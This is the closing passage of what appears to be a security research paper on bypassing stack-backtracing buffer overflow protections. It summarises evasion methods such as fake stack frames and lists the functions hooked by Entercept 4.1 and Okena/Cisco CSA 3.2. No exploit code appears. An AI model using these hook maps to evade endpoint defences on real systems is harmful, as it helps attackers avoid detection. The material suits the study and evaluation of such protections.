checking which relies on stack backtracing. | |
Stack backtracing involves traversing stack frames and verifying that | |
the return addresses do not originate from writable memory segments such | |
as stack or heap areas. | |
The paper presents a number of different ways to bypass both userland | |
and kernel based stack backtracing. These range from tampering with | |
function preambles to creating fake stack frames. | |
In conclusion, the majority of current buffer overflow protection | |
implementations are flawed, providing a false sense of security and | |
little real protection against determined attackers. | |
Appendix A: Entercept 4.1 Hooks | |
Entercept hooks a number of functions in userland and in the kernel. Here | |
is a list of the currently hooked functions as of Entercept 4.1. | |
User Land | |
msvcrt.dll | |
_creat | |
_read | |
_write | |
system | |
kernel32.dll | |
CreatePipe | |
CreateProcessA | |
GetProcAddress | |
GetStartupInfoA | |
LoadLibraryA | |
PeekNamedPipe | |
ReadFile | |
VirtualProtect | |
VirtualProtectEx | |
WinExec | |
WriteFile | |
advapi32.dll | |
RegOpenKeyA | |
rpcrt4.dll | |
NdrServerInitializeMarshall | |
user32.dll | |
ExitWindowsEx | |
ws2_32.dll | |
WPUCompleteOverlappedRequest | |
WSAAddressToStringA | |
WSACancelAsyncRequest | |
WSACloseEvent | |
WSAConnect | |
WSACreateEvent | |
WSADuplicateSocketA | |
WSAEnumNetworkEvents | |
WSAEventSelect | |
WSAGetServiceClassInfoA | |
WSCInstallNameSpace | |
wininet.dll | |
InternetSecurityProtocolToStringW | |
InternetSetCookieA | |
InternetSetOptionExA | |
lsasrv.dll | |
LsarLookupNames | |
LsarLookupSids2 | |
msv1_0.dll | |
Msv1_0ExportSubAuthenticationRoutine | |
Msv1_0SubAuthenticationPresent | |
Kernel | |
NtConnectPort | |
NtCreateProcess | |
NtCreateThread | |
NtCreateToken | |
NtCreateKey | |
NtDeleteKey | |
NtDeleteValueKey | |
NtEnumerateKey | |
NtEnumerateValueKey | |
NtLoadKey | |
NtLoadKey2 | |
NtQueryKey | |
NtQueryMultipleValueKey | |
NtQueryValueKey | |
NtReplaceKey | |
NtRestoreKey | |
NtSetValueKey | |
NtMakeTemporaryObject | |
NtSetContextThread | |
NtSetInformationProcess | |
NtSetSecurityObject | |
NtTerminateProcess | |
Appendix B: Okena/Cisco CSA 3.2 Hooks | |
Okena/CSA hooks many functions in userland but far fewer in the kernel.
A lot of the userland hooks are the same ones that Entercept hooks. | |
However, almost all of the functions Okena/CSA hooks in the kernel are | |
related to altering keys in the Windows registry. Okena/CSA does not | |
seem as concerned as Entercept about backtracing calls in the kernel. | |
This leads to an interesting vulnerability, left as an exercise to the | |
reader. | |
User Land | |
kernel32.dll | |
CreateProcessA | |
CreateProcessW | |
CreateRemoteThread | |
CreateThread | |
FreeLibrary | |
LoadLibraryA | |
LoadLibraryExA | |
LoadLibraryExW | |
LoadLibraryW | |
LoadModule | |
OpenProcess | |
VirtualProtect | |
VirtualProtectEx | |
WinExec | |
WriteProcessMemory | |
ole32.dll | |
CoFileTimeToDosDateTime | |
CoGetMalloc | |
CoGetStandardMarshal | |
CoGetState | |
CoResumeClassObjects | |
CreateObjrefMoniker | |
CreateStreamOnHGlobal | |
DllGetClassObject | |
StgSetTimes | |
StringFromCLSID | |
oleaut32.dll | |
LPSAFEARRAY_UserUnmarshal | |
urlmon.dll | |
CoInstall | |
Kernel | |
NtCreateKey | |
NtOpenKey | |
NtDeleteKey | |
NtDeleteValueKey | |
NtSetValueKey | |
NtOpenProcess | |
NtWriteVirtualMemory | |
|=[ EOF ]=---------------------------------------------------------------=| |